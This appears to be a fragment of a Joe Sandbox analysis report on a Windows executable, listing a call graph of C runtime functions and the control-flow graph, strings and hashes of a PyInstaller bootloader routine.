18688->18687 18690 7ff79daf270e 18689->18690 18691 7ff79daf272b 18689->18691 18690->18691 18692 7ff79daf271c 18690->18692 18693 7ff79daf2735 18691->18693 19034 7ff79daf6f48 18691->19034 18694 7ff79dae43f4 _get_daylight 11 API calls 18692->18694 19041 7ff79daf6f84 18693->19041 18697 7ff79daf2721 memcpy_s 18694->18697 18697->18544 18699 7ff79dae4178 45 API calls 18698->18699 18700 7ff79daf65ba 18699->18700 18701 7ff79daf65c8 18700->18701 19053 7ff79daee234 18700->19053 19056 7ff79dae47bc 18701->19056 18705 7ff79daf66b4 18707 7ff79daf66c5 18705->18707 18709 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18705->18709 18706 7ff79dae4178 45 API calls 18708 7ff79daf6637 18706->18708 18710 7ff79daefeb3 18707->18710 18712 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18707->18712 18711 7ff79daee234 5 API calls 18708->18711 18713 7ff79daf6640 18708->18713 18709->18707 18710->18563 18710->18564 18711->18713 18712->18710 18714 7ff79dae47bc 14 API calls 18713->18714 18715 7ff79daf669b 18714->18715 18715->18705 18716 7ff79daf66a3 SetEnvironmentVariableW 18715->18716 18716->18705 18718 7ff79daf03bc 18717->18718 18725 7ff79daf039f 18717->18725 18719 7ff79daedea8 _get_daylight 11 API calls 18718->18719 18727 7ff79daf03e0 18719->18727 18720 7ff79daf0464 18722 7ff79dae9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18720->18722 18721 7ff79daf0441 18723 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18721->18723 18724 7ff79daf046a 18722->18724 18723->18725 18725->18574 18726 7ff79daedea8 _get_daylight 11 API calls 18726->18727 18727->18720 18727->18721 18727->18726 18728 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18727->18728 18729 7ff79daef784 37 API calls 18727->18729 18730 7ff79daf0450 18727->18730 18728->18727 18729->18727 18731 7ff79dae9c10 _isindst 17 API calls 18730->18731 18731->18720 18733 7ff79dae8a24 18732->18733 18734 7ff79dae8a2d 18732->18734 18733->18734 19078 7ff79dae8524 18733->19078 18734->18590 18734->18591 18739 7ff79daf6309 18738->18739 18742 7ff79daf6336 18738->18742 18740 7ff79daf630e 18739->18740 18739->18742 18741 7ff79dae43f4 _get_daylight 11 API calls 18740->18741 18744 7ff79daf6313 18741->18744 18743 7ff79daf637a 18742->18743 18746 7ff79daf6399 18742->18746 18760 7ff79daf636e __crtLCMapStringW 18742->18760 18745 7ff79dae43f4 _get_daylight 11 API calls 18743->18745 18747 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18744->18747 18748 7ff79daf637f 18745->18748 18749 7ff79daf63b5 18746->18749 18750 7ff79daf63a3 18746->18750 18751 7ff79daf631e 18747->18751 18752 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18748->18752 18754 7ff79dae4178 45 API calls 18749->18754 18753 7ff79dae43f4 _get_daylight 11 API calls 18750->18753 18751->18584 18752->18760 18755 7ff79daf63a8 18753->18755 18756 7ff79daf63c2 18754->18756 18757 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18755->18757 18756->18760 19125 7ff79daf7e18 18756->19125 18757->18760 18760->18584 18761 7ff79dae43f4 _get_daylight 11 API calls 18761->18760 18763 7ff79dae84c9 18762->18763 18776 7ff79dae84c5 18762->18776 18785 7ff79daf1900 18763->18785 18768 7ff79dae84db 18770 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18768->18770 18769 7ff79dae84e7 18811 7ff79dae8594 18769->18811 18770->18776 18773 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18774 7ff79dae850e 18773->18774 18775 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18774->18775 18775->18776 18776->18648 18777 7ff79dae8804 18776->18777 18778 7ff79dae882d 18777->18778 18783 7ff79dae8846 18777->18783 18778->18648 18779 7ff79daedea8 _get_daylight 11 API calls 18779->18783 18780 7ff79dae88d6 18782 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18780->18782 18781 7ff79daefaf8 WideCharToMultiByte 18781->18783 18782->18778 18783->18778 18783->18779 18783->18780 18783->18781 18784 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18783->18784 18784->18783 18786 7ff79daf190d 18785->18786 18787 7ff79dae84ce 18785->18787 18830 7ff79daea534 18786->18830 18791 7ff79daf1c3c GetEnvironmentStringsW 18787->18791 18792 7ff79dae84d3 18791->18792 18793 7ff79daf1c6c 18791->18793 18792->18768 18792->18769 18794 7ff79daefaf8 WideCharToMultiByte 18793->18794 18795 7ff79daf1cbd 18794->18795 18796 7ff79daf1cc4 FreeEnvironmentStringsW 18795->18796 18797 7ff79daec90c _fread_nolock 12 API calls 18795->18797 18796->18792 18798 7ff79daf1cd7 18797->18798 18799 7ff79daf1cdf 18798->18799 18800 7ff79daf1ce8 18798->18800 18802 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18799->18802 18801 7ff79daefaf8 WideCharToMultiByte 18800->18801 18804 7ff79daf1d0b 18801->18804 18803 7ff79daf1ce6 18802->18803 18803->18796 18805 7ff79daf1d0f 18804->18805 18806 7ff79daf1d19 18804->18806 18807 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18805->18807 18808 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18806->18808 18809 7ff79daf1d17 FreeEnvironmentStringsW 18807->18809 18808->18809 18809->18792 18812 7ff79dae85b9 18811->18812 18813 7ff79daedea8 _get_daylight 11 API calls 18812->18813 18826 7ff79dae85ef 18813->18826 18814 7ff79dae85f7 18815 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18814->18815 18816 7ff79dae84ef 18815->18816 18816->18773 18817 7ff79dae866a 18818 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18817->18818 18818->18816 18819 7ff79daedea8 _get_daylight 11 API calls 18819->18826 18820 7ff79dae8659 18979 7ff79dae87c0 18820->18979 18822 7ff79dae97b4 __std_exception_copy 37 API calls 18822->18826 18824 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18824->18814 18825 7ff79dae868f 18827 7ff79dae9c10 _isindst 17 API calls 18825->18827 18826->18814 18826->18817 18826->18819 18826->18820 18826->18822 18826->18825 18828 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18826->18828 18829 7ff79dae86a2 18827->18829 18828->18826 18831 7ff79daea545 FlsGetValue 18830->18831 18832 7ff79daea560 FlsSetValue 18830->18832 18833 7ff79daea552 18831->18833 18834 7ff79daea55a 18831->18834 18832->18833 18835 7ff79daea56d 18832->18835 18836 7ff79daea558 18833->18836 18837 7ff79dae9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18833->18837 18834->18832 18838 7ff79daedea8 _get_daylight 11 API calls 18835->18838 18850 7ff79daf15d4 18836->18850 18839 7ff79daea5d5 18837->18839 18840 7ff79daea57c 18838->18840 18841 7ff79daea59a FlsSetValue 18840->18841 18842 7ff79daea58a FlsSetValue 18840->18842 18843 7ff79daea5a6 FlsSetValue 18841->18843 18844 7ff79daea5b8 18841->18844 18845 7ff79daea593 18842->18845 18843->18845 18846 7ff79daea204 _get_daylight 11 API calls 18844->18846 18847 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18845->18847 18848 7ff79daea5c0 18846->18848 18847->18833 18849 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18848->18849 18849->18836 18873 7ff79daf1844 18850->18873 18852 7ff79daf1609 18888 7ff79daf12d4 18852->18888 18855 7ff79daf1626 18855->18787 18856 7ff79daec90c _fread_nolock 12 API calls 18857 7ff79daf1637 18856->18857 18858 7ff79daf163f 18857->18858 18860 7ff79daf164e 18857->18860 18859 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18858->18859 18859->18855 18860->18860 18895 7ff79daf197c 18860->18895 18863 7ff79daf174a 18864 7ff79dae43f4 _get_daylight 11 API calls 18863->18864 18865 7ff79daf174f 18864->18865 18867 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18865->18867 18866 7ff79daf17a5 18869 7ff79daf180c 18866->18869 18906 7ff79daf1104 18866->18906 18867->18855 18868 7ff79daf1764 18868->18866 18871 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18871 18870 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18869->18870 18870->18855 18871->18866 18874 7ff79daf1867 18873->18874 18875 7ff79daf1871 18874->18875 18921 7ff79daef5e8 EnterCriticalSection 18874->18921 18879 7ff79daf18e3 18875->18879 18881 7ff79dae9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18875->18881 18879->18852 18882 7ff79daf18fb 18881->18882 18884 7ff79daf1952 18882->18884 18885 7ff79daea534 50 API calls 18882->18885 18884->18852 18886 7ff79daf193c 18885->18886 18887 7ff79daf15d4 65 API calls 18886->18887 18887->18884 18889 7ff79dae4178 45 API calls 18888->18889 18890 7ff79daf12e8 18889->18890 18891 7ff79daf1306 18890->18891 18892 7ff79daf12f4 GetOEMCP 18890->18892 18893 7ff79daf131b 18891->18893 18894 7ff79daf130b GetACP 18891->18894 18892->18893 18893->18855 18893->18856 18894->18893 18896 7ff79daf12d4 47 API calls 18895->18896 18897 7ff79daf19a9 18896->18897 18898 7ff79daf1aff 18897->18898 18899 7ff79daf19e6 IsValidCodePage 18897->18899 18905 7ff79daf1a00 memcpy_s 18897->18905 18900 7ff79dadb870 _log10_special 8 API calls 18898->18900 18899->18898 18901 7ff79daf19f7 18899->18901 18902 7ff79daf1741 18900->18902 18903 7ff79daf1a26 GetCPInfo 18901->18903 18901->18905 18902->18863 18902->18868 18903->18898 18903->18905 18922 7ff79daf13ec 18905->18922 18978 7ff79daef5e8 EnterCriticalSection 18906->18978 18923 7ff79daf1429 GetCPInfo 18922->18923 18924 7ff79daf151f 18922->18924 18923->18924 18926 7ff79daf143c 18923->18926 18925 7ff79dadb870 _log10_special 8 API calls 18924->18925 18927 7ff79daf15be 18925->18927 18928 7ff79daf2150 48 API calls 18926->18928 18927->18898 18929 7ff79daf14b3 18928->18929 18933 7ff79daf6e94 18929->18933 18932 7ff79daf6e94 54 API calls 18932->18924 18934 7ff79dae4178 45 API calls 18933->18934 18935 7ff79daf6eb9 18934->18935 18938 7ff79daf6b60 18935->18938 18939 7ff79daf6ba1 18938->18939 18940 7ff79daeebb0 _fread_nolock MultiByteToWideChar 18939->18940 18944 7ff79daf6beb 18940->18944 18941 7ff79daf6e69 18942 7ff79dadb870 _log10_special 8 API calls 18941->18942 18943 7ff79daf14e6 18942->18943 18943->18932 18944->18941 18945 7ff79daec90c _fread_nolock 12 API calls 18944->18945 18946 7ff79daf6d21 18944->18946 18947 7ff79daf6c23 18944->18947 18945->18947 18946->18941 18948 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18946->18948 18947->18946 18949 7ff79daeebb0 _fread_nolock MultiByteToWideChar 18947->18949 18948->18941 18950 7ff79daf6c96 18949->18950 18950->18946 18969 7ff79daee3f4 18950->18969 18953 7ff79daf6ce1 18953->18946 18956 7ff79daee3f4 __crtLCMapStringW 6 API calls 18953->18956 18954 7ff79daf6d32 18955 7ff79daec90c _fread_nolock 12 API calls 18954->18955 18957 7ff79daf6e04 18954->18957 18959 7ff79daf6d50 18954->18959 18955->18959 18956->18946 18957->18946 18958 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18957->18958 18958->18946 18959->18946 18960 7ff79daee3f4 __crtLCMapStringW 6 API calls 18959->18960 18961 7ff79daf6dd0 18960->18961 18961->18957 18962 7ff79daf6e06 18961->18962 18963 7ff79daf6df0 18961->18963 18965 7ff79daefaf8 WideCharToMultiByte 18962->18965 18964 7ff79daefaf8 WideCharToMultiByte 18963->18964 18966 7ff79daf6dfe 18964->18966 18965->18966 18966->18957 18967 7ff79daf6e1e 18966->18967 18967->18946 18968 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18967->18968 18968->18946 18970 7ff79daee020 __crtLCMapStringW 5 API calls 18969->18970 18971 7ff79daee432 18970->18971 18972 7ff79daee43a 18971->18972 18975 7ff79daee4e0 18971->18975 18972->18946 18972->18953 18972->18954 18974 7ff79daee4a3 LCMapStringW 18974->18972 18976 7ff79daee020 __crtLCMapStringW 5 API calls 18975->18976 18977 7ff79daee50e __crtLCMapStringW 18976->18977 18977->18974 18980 7ff79dae87c5 18979->18980 18984 7ff79dae8661 18979->18984 18981 7ff79dae87ee 18980->18981 18982 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18980->18982 18983 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18981->18983 18982->18980 18983->18984 18984->18824 18986 7ff79daf55d1 18985->18986 18987 7ff79daf55e8 18985->18987 18988 7ff79dae43f4 _get_daylight 11 API calls 18986->18988 18987->18986 18989 7ff79daf55f6 18987->18989 18990 7ff79daf55d6 18988->18990 18992 7ff79dae4178 45 API calls 18989->18992 18993 7ff79daf55e1 18989->18993 18991 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 18990->18991 18991->18993 18992->18993 18993->18687 18995 7ff79dae4178 45 API calls 18994->18995 18996 7ff79daf8281 18995->18996 18999 7ff79daf7ed8 18996->18999 19001 7ff79daf7f26 18999->19001 19000 7ff79dadb870 _log10_special 8 API calls 19002 7ff79daf6515 19000->19002 19003 7ff79daf7fad 19001->19003 19005 7ff79daf7f98 GetCPInfo 19001->19005 19009 7ff79daf7fb1 19001->19009 19002->18687 19002->18688 19004 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19003->19004 19003->19009 19006 7ff79daf8045 19004->19006 19005->19003 19005->19009 19007 7ff79daec90c _fread_nolock 12 API calls 19006->19007 19008 7ff79daf807c 19006->19008 19006->19009 19007->19008 19008->19009 19010 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19008->19010 19009->19000 19011 7ff79daf80ea 19010->19011 19012 7ff79daf81cc 19011->19012 19013 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19011->19013 19012->19009 19014 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19012->19014 19015 7ff79daf8110 19013->19015 19014->19009 19015->19012 19016 7ff79daec90c _fread_nolock 12 API calls 19015->19016 19017 7ff79daf813d 19015->19017 19016->19017 19017->19012 19018 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19017->19018 19019 7ff79daf81b4 19018->19019 19020 7ff79daf81d4 19019->19020 19021 7ff79daf81ba 19019->19021 19028 7ff79daee278 19020->19028 19021->19012 19023 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19021->19023 19023->19012 19025 7ff79daf8213 19025->19009 19027 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19025->19027 19026 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19026->19025 19027->19009 19029 7ff79daee020 __crtLCMapStringW 5 API calls 19028->19029 19030 7ff79daee2b6 19029->19030 19031 7ff79daee2be 19030->19031 19032 7ff79daee4e0 __crtLCMapStringW 5 API calls 19030->19032 19031->19025 19031->19026 19033 7ff79daee327 CompareStringW 19032->19033 19033->19031 19035 7ff79daf6f51 19034->19035 19036 7ff79daf6f6a HeapSize 19034->19036 19037 7ff79dae43f4 _get_daylight 11 API calls 19035->19037 19038 7ff79daf6f56 19037->19038 19039 7ff79dae9bf0 _invalid_parameter_noinfo 37 API calls 19038->19039 19040 7ff79daf6f61 19039->19040 19040->18693 19042 7ff79daf6fa3 19041->19042 19043 7ff79daf6f99 19041->19043 19044 7ff79daf6fa8 19042->19044 19051 7ff79daf6faf _get_daylight 19042->19051 19045 7ff79daec90c _fread_nolock 12 API calls 19043->19045 19046 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19044->19046 19049 7ff79daf6fa1 19045->19049 19046->19049 19047 7ff79daf6fb5 19050 7ff79dae43f4 _get_daylight 11 API calls 19047->19050 19048 7ff79daf6fe2 HeapReAlloc 19048->19049 19048->19051 19049->18697 19050->19049 19051->19047 19051->19048 19052 7ff79daf28a0 _get_daylight 2 API calls 19051->19052 19052->19051 19054 7ff79daee020 __crtLCMapStringW 5 API calls 19053->19054 19055 7ff79daee254 19054->19055 19055->18701 19057 7ff79dae47e6 19056->19057 19058 7ff79dae480a 19056->19058 19061 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19057->19061 19077 7ff79dae47f5 19057->19077 19059 7ff79dae4864 19058->19059 19062 7ff79dae480f 19058->19062 19060 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19059->19060 19069 7ff79dae4880 19060->19069 19061->19077 19063 7ff79dae4824 19062->19063 19064 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19062->19064 19062->19077 19065 7ff79daec90c _fread_nolock 12 API calls 19063->19065 19064->19063 19065->19077 19066 7ff79dae4887 GetLastError 19068 7ff79dae4368 _fread_nolock 11 API calls 19066->19068 19067 7ff79dae48c2 19071 7ff79daeebb0 _fread_nolock MultiByteToWideChar 19067->19071 19067->19077 19072 7ff79dae4894 19068->19072 19069->19066 19069->19067 19070 7ff79dae48b5 19069->19070 19074 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19069->19074 19075 7ff79daec90c _fread_nolock 12 API calls 19070->19075 19076 7ff79dae4906 19071->19076 19073 7ff79dae43f4 _get_daylight 11 API calls 19072->19073 19073->19077 19074->19070 19075->19067 19076->19066 19076->19077 19077->18705 19077->18706 19079 7ff79dae853d 19078->19079 19080 7ff79dae8539 19078->19080 19099 7ff79daf1d4c GetEnvironmentStringsW 19079->19099 19080->18734 19091 7ff79dae88e4 19080->19091 19083 7ff79dae8556 19106 7ff79dae86a4 19083->19106 19084 7ff79dae854a 19085 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19084->19085 19085->19080 19088 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19089 7ff79dae857d 19088->19089 19090 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19089->19090 19090->19080 19092 7ff79dae8907 19091->19092 19097 7ff79dae891e 19091->19097 19092->18734 19093 7ff79daedea8 _get_daylight 11 API calls 19093->19097 19094 7ff79dae8992 19096 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19094->19096 19095 7ff79daeebb0 MultiByteToWideChar _fread_nolock 19095->19097 19096->19092 19097->19092 19097->19093 19097->19094 19097->19095 19098 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19097->19098 19098->19097 19100 7ff79dae8542 19099->19100 19101 7ff79daf1d70 19099->19101 19100->19083 19100->19084 19102 7ff79daec90c _fread_nolock 12 API calls 19101->19102 19103 7ff79daf1da7 memcpy_s 19102->19103 19104 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19103->19104 19105 7ff79daf1dc7 FreeEnvironmentStringsW 19104->19105 19105->19100 19107 7ff79dae86cc 19106->19107 19108 7ff79daedea8 _get_daylight 11 API calls 19107->19108 19114 7ff79dae8707 19108->19114 19109 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19111 7ff79dae855e 19109->19111 19110 7ff79dae8789 19112 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19110->19112 19111->19088 19112->19111 19113 7ff79daedea8 _get_daylight 11 API calls 19113->19114 19114->19110 19114->19113 19115 7ff79dae8778 19114->19115 19116 7ff79daef784 37 API calls 19114->19116 19120 7ff79dae87ac 19114->19120 19121 7ff79dae870f 19114->19121 19123 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19114->19123 19117 7ff79dae87c0 11 API calls 19115->19117 19116->19114 19118 7ff79dae8780 19117->19118 19119 7ff79dae9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19118->19119 19119->19121 19122 7ff79dae9c10 _isindst 17 API calls 19120->19122 19121->19109 19124 7ff79dae87be 19122->19124 19123->19114 19126 7ff79daf7e41 __crtLCMapStringW 19125->19126 19127 7ff79daf63fe 19126->19127 19128 7ff79daee278 6 API calls 19126->19128 19127->18760 19127->18761 19128->19127

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF79DAD1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 7ff79dad1000-7ff79dad3536 call 7ff79dadf138 call 7ff79dadf140 call 7ff79dadbb70 call 7ff79dae4700 call 7ff79dae4794 call 7ff79dad33e0 14 7ff79dad3544-7ff79dad3566 call 7ff79dad18f0 0->14 15 7ff79dad3538-7ff79dad353f 0->15 21 7ff79dad3736-7ff79dad374c call 7ff79dad3f70 14->21 22 7ff79dad356c-7ff79dad3583 call 7ff79dad1bf0 14->22 16 7ff79dad371a-7ff79dad3735 call 7ff79dadb870 15->16 27 7ff79dad3785-7ff79dad379a call 7ff79dad25f0 21->27 28 7ff79dad374e-7ff79dad377b call 7ff79dad76a0 21->28 26 7ff79dad3588-7ff79dad35c1 22->26 29 7ff79dad3653-7ff79dad366d call 7ff79dad7e10 26->29 30 7ff79dad35c7-7ff79dad35cb 26->30 44 7ff79dad3712 27->44 41 7ff79dad379f-7ff79dad37be call 7ff79dad1bf0 28->41 42 7ff79dad377d-7ff79dad3780 call 7ff79dadf36c 28->42 45 7ff79dad3695-7ff79dad369c 29->45 46 7ff79dad366f-7ff79dad3675 29->46 34 7ff79dad35cd-7ff79dad35e5 call 7ff79dae4560 30->34 35 7ff79dad3638-7ff79dad364d call 7ff79dad18e0 30->35 54 7ff79dad35f2-7ff79dad360a call 7ff79dae4560 34->54 55 7ff79dad35e7-7ff79dad35eb 34->55 35->29 35->30 61 7ff79dad37c1-7ff79dad37ca 41->61 42->27 44->16 48 7ff79dad3844-7ff79dad3863 call 7ff79dad3e90 45->48 49 7ff79dad36a2-7ff79dad36c0 call 7ff79dad7e10 call 7ff79dad7f80 45->49 52 7ff79dad3682-7ff79dad3690 call 7ff79dae415c 46->52 53 7ff79dad3677-7ff79dad3680 46->53 69 7ff79dad3865-7ff79dad386f call 7ff79dad3fe0 48->69 70 7ff79dad3871-7ff79dad3882 call 7ff79dad1bf0 48->70 78 7ff79dad36c6-7ff79dad36c9 49->78 79 7ff79dad380f-7ff79dad381e call 7ff79dad8400 49->79 52->45 53->52 66 7ff79dad360c-7ff79dad3610 54->66 67 7ff79dad3617-7ff79dad362f call 7ff79dae4560 54->67 55->54 61->61 65 7ff79dad37cc-7ff79dad37e9 call 7ff79dad18f0 61->65 65->26 82 7ff79dad37ef-7ff79dad3800 call 7ff79dad25f0 65->82 66->67 67->35 83 7ff79dad3631 67->83 81 7ff79dad3887-7ff79dad38a1 call 7ff79dad86b0 69->81 70->81 78->79 84 7ff79dad36cf-7ff79dad36f6 call 7ff79dad1bf0 78->84 95 7ff79dad3820 79->95 96 7ff79dad382c-7ff79dad382f call 7ff79dad7c40 79->96 91 7ff79dad38a3 81->91 92 7ff79dad38af-7ff79dad38c1 SetDllDirectoryW 81->92 82->44 83->35 100 7ff79dad3805-7ff79dad380d call 7ff79dae415c 84->100 101 7ff79dad36fc-7ff79dad3703 call 7ff79dad25f0 84->101 91->92 98 7ff79dad38c3-7ff79dad38ca 92->98 99 7ff79dad38d0-7ff79dad38ec call 7ff79dad6560 call 7ff79dad6b00 92->99 95->96 102 7ff79dad3834-7ff79dad3836 96->102 98->99 103 7ff79dad3a50-7ff79dad3a58 98->103 118 7ff79dad38ee-7ff79dad38f4 99->118 119 7ff79dad3947-7ff79dad394a call 7ff79dad6510 99->119 100->81 112 7ff79dad3708-7ff79dad370a 101->112 102->81 109 7ff79dad3838 102->109 107 7ff79dad3a7d-7ff79dad3aaf call 7ff79dad33d0 call 7ff79dad3080 call 7ff79dad33a0 call 7ff79dad6780 call 7ff79dad6510 103->107 108 7ff79dad3a5a-7ff79dad3a77 PostMessageW GetMessageW 103->108 108->107 109->48 112->44 121 7ff79dad38f6-7ff79dad3903 call 7ff79dad65a0 118->121 122 7ff79dad390e-7ff79dad3918 call 7ff79dad6970 118->122 126 7ff79dad394f-7ff79dad3956 119->126 121->122 135 7ff79dad3905-7ff79dad390c 121->135 132 7ff79dad3923-7ff79dad3931 call 7ff79dad6cd0 122->132 133 7ff79dad391a-7ff79dad3921 122->133 126->103 131 7ff79dad395c-7ff79dad3966 call 7ff79dad30e0 126->131 131->112 141 7ff79dad396c-7ff79dad3980 call 7ff79dad83e0 131->141 132->126 146 7ff79dad3933 132->146 137 7ff79dad393a-7ff79dad3942 call 7ff79dad2870 call 7ff79dad6780 133->137 135->137 137->119 151 7ff79dad39a5-7ff79dad39e1 call 7ff79dad7f20 call 7ff79dad7fc0 call 7ff79dad6780 call 7ff79dad6510 call 7ff79dad7ec0 141->151 152 7ff79dad3982-7ff79dad399f PostMessageW GetMessageW 141->152 146->137 162 7ff79dad39e6-7ff79dad39e8 151->162 152->151 163 7ff79dad3a3d-7ff79dad3a4b call 7ff79dad18a0 162->163 164 7ff79dad39ea-7ff79dad3a00 call 7ff79dad81f0 call 7ff79dad7ec0 162->164 163->112 164->163 171 7ff79dad3a02-7ff79dad3a10 164->171 172 7ff79dad3a31-7ff79dad3a38 call 7ff79dad2870 171->172 173 7ff79dad3a12-7ff79dad3a2c call 7ff79dad25f0 call 7ff79dad18a0 171->173 172->163 173->112
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                                                                                                                  • Opcode ID: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
                                                                                                                                                                                                                                  • Instruction ID: 16d6530cb4a04c481259cc75bccc26bc62c9bbbcbce904c28467a49200b56822
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31F18D21A0C68291EA38FB75D565AF9A261EF54780FC44032DA9D436D6FF2CED78C360
                                                                                                                                                                                                                                  Function 00007FF79DAF5C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
